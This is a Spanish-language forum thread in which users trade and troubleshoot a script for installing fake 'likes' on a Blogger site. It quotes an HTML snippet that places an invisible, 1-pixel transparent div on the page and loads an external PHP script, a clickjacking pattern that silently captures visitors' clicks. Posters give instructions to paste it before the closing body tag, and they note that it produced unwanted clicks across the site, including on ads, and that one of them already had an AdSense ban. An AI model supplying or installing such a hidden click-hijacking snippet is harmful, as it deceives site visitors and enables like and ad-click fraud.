K
[MENTION=46630]kedinn[/MENTION] Esta funcionando?, quiero utilizarlo
solo hay una forma de saberlo intentandolo :encouragement:
solo hay una forma de saberlo intentandolo :encouragement:
<div id="cjk-jlike-6" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:1px; height:1px; overflow:hidden"></div>
<script type="text/javascript" src="https://sites.google.com/site/filesimges/js/scriptlike.php"></script>
El problema lo quiero en blogger, ya subi el like.js a yourjavascript, pero como agrego el script directo a la plantilla, blogger no acepta php, hago otro .js con el script?
lo intente en blogger pero al momento de pegar el code entre body y /body me salto varios errores y me resigne u.u pense que era la plantilla que usaba y creo que lo es,
el que es php (scritp txt) tienes que agregarlo en body y /body lo agregar directo a la plantilla solamente te vas a --editar plantilla te aparecera todo el code que confirma la plantilla lo copias y pegas antes del cierre de /body
Si ya lo agregue pero desde un archivo externo php, la plantilla no acepta php, espero que funcione 😕
dame tu url para probar y me dices si funca
echando a perder se aprende :encouragement:
Ya tengo un bane de adsense por click inválidos :sorrow::sorrow::sorrow: ahora utilizo otra cuenta y tengo miedo utilizar este script al parecer malicioso.
que me dices si aparecio di varios clicks en toda la web hasta en la publicidad xD
que me dices si aparecio di varios clicks en toda la web hasta en la publicidad xD
No no sirvio, resubire los archivos de uno por uno y los probare que esten correctos
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?